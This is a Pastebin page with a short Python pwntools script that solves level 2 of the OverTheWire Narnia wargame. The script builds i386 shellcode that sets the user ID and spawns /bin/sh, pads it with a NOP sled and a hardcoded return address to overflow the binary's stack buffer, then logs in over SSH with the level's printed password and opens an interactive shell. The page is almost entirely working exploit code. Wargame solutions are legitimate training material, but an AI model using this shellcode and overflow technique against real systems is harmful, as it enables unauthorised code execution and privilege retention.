daily pastebin goal
10%
SHARE
TWEET

Untitled

a guest Jun 13th, 2018 449 in 237 days
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from pwn import *                                                                                            
  2. context(arch='i386', os='linux')                                                                              
  3.                                                                                                              
  4. assembly_shellcode = """                                                                                      
  5.        xor eax, eax                                                                                          
  6.        mov al, 0x31                                                                                          
  7.        int 0x80                                                                                                                
  8.                                                                                                                                
  9.        mov ebx, eax                                                                                                            
  10.        mov ecx, eax                                                                                                            
  11.        mov edx, eax                                                                                                            
  12.        xor eax, eax                                                                                                            
  13.        mov al, 0xa4                                                                                                            
  14.        int 0x80                                                                                                                
  15.                                                                                                                                
  16.        xor eax, eax                                                                                                            
  17.        push eax                                                                                                                
  18.        push 0x68732f6e                                                                                                        
  19.        push 0x69622f2f                                                                                                        
  20.        mov ebx, esp                                                                                                            
  21.        push eax                                                                                                                
  22.        mov edx, esp                                                                                                            
  23.        push ebx                                                                                                                
  24.        mov ecx, esp                                                                                                            
  25.        mov al, 11                                                                                                              
  26.        int 0x80                                                                                                                
  27. """                                                                                                            
  28.                                                                                                              
  29. shellcode = '\x90' * 96 + asm(assembly_shellcode) + p32(0xffffd6c0)                                          
  30.                                                                                                                                 if __name__=="__main__":                                                                                                        
  31.     io = ssh(user="narnia2", host="narnia.labs.overthewire.org", password="nairiepecu", port=2226)            
  32.     sh = io.run("/narnia/narnia2 {}".format(shellcode))                                                        
  33.     sh.interactive()                                                                                          
  34.     io.close()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top